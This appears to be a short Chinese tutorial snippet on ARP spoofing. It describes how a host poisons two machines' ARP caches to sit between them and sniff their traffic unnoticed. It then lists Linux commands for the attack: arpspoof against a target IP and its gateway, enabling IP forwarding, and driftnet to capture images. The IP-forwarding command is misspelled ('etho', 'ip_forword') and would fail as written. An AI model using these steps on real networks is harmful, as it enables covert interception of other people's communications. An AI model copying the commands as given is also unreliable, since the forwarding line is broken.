实例 三台主机之间,IP分别为ip1 ip2 ip3,物理地址分别为MAC1 MAC2 MAC3,1要嗅探2和3之间的通信数据,1先向2发送一个ARP应答报文,其中包含的映射关系为ip3/MAC1,2收到这个应答后,更新自己的缓存,保存映射关系ip3/MAC1;随后1向3发送一个ARP应答报文,其中包含的映射关系为ip2/MAC1,3收听到应答之后,更新自己的缓存,保存映射关系ip2/MAC1,至此2和3通信的数据都将发给1

截取信息之后,1可以把数据转发到正确的目的地,而2和3都无法察觉到嗅探。鉴于arp缓存会定期更新,所以只要在小于更新时间间隔的频率发送ARP欺诈报文,就可以持续的嗅探了。

命令:(Linux环境)

arpspoof -i eth0 -t 172.28.15.53(目的ip地址) .......(目的IP的网关)【欺诈主机】

etho 1 > /proc/sys/net/ipv4/ip_forword(保存到指定目录)

driftnet(监听图片)

arpspoof -i eth0 -t 172.28.15.254(目的IP的网关) .......(目的IP地址)【欺诈网关】

wKiom1fiPwniSNhXAAFe8LuamEs741.jpg-wh_50

wKioL1fiPwqBn7cyAABDLV8F1pg564.jpg-wh_50

wKioL1fiPwrw7GJDAACq4P7vLa4447.png-wh_50

wKiom1fiPwvyPPnZAAFXM25LRh4746.jpg-wh_50